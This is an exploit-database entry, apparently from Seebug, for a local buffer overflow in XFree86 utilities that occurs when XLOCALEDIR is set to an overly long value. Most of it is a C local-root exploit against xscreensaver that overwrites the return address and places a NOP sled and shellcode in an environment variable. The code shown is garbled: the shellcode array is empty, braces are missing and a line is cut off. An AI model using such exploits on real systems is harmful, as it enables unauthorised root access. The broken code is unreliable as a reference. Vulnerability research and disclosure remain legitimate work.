XFree86 4.2 XLOCALEDIR Local Buffer Overflow Vulnerability (2)

ID SSV:76126
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.

                                                source: http://www.securityfocus.com/bid/7002/info
Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable.
A local attacker can exploit this vulnerability by setting the XLOCALEDIR environment variable to an overly long value. When the vulnerable utilities are executed, the buffer overflow vulnerability will be triggered.

** Tested on rh 7.3 using XFree86
** xscreensaver vulnerability
** AUTHORS: Angelo Rosiello (Guilecool) & deka
** REQUIRES: X must be run!
** EFFECTS: local root exploit!
** deka is leet brother, thank you :>
** MAIL: guilecool@usa.com

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define RETADDR 0xbfffdf20 //change it if u need

char shellcode[] =

int main()
        char buf[4076];
        unsigned long retaddr = RETADDR;

        memset(buf, 0x0, 4076);
        memset(buf, 0x41, 4072);
        memcpy(buf+2076, &retaddr, 0x4);
        setenv("XLOCALEDIR", buf, 1);
        memset(buf, 0x90, 4072);
        memcpy((buf+4072-strlen(shellcode)), shellcode, strlen
        setenv("HAXHAX", buf, 1);
        execl("/usr/X11R6/bin/xscreensaver", "xscreensaver", 0);